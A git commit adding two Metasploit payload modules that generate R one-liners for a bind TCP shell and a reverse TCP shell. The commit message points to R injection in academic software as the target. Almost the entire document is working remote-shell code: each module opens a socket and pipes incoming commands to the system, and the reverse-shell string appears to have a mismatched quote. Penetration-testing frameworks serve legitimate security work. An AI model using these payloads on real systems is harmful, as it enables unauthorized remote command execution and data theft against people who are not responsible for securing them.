Reverse and bind shells in R

Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions
2017-08-19 05:57:45 -04:00 · 2017-08-19 05:57:45 -04:00 · d76616e8e8
parent 6ecdb8f2cc
commit d76616e8e8
2 changed files with 88 additions and 0 deletions
--- a/modules/payloads/singles/r/shell_bind_tcp.rb
+++ b/modules/payloads/singles/r/shell_bind_tcp.rb
@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'R Command Shell, Bind TCP',
+      'Description' => 'Continually listen for a connection and spawn a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'r',
+      'Arch'        => ARCH_R,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'r',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def r_string
+    return "s<-socketConnection(port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s,1))),s)}"
+  end
+end
--- a/modules/payloads/singles/r/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/r/shell_reverse_tcp.rb
@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 516
+
+  include Msf::Payload::Single
+  include Msf::Payload::R
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'R Command Shell, Reverse TCP',
+      'Description' => 'Connect back and create a command shell via R',
+      'Author'      => [ 'RageLtMan' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'r',
+      'Arch'        => ARCH_R,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'r',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return prepends(r_string)
+  end
+
+  def r_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+    return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+    "(pipe(readLines(s, 1))),s)}"
+  end
+end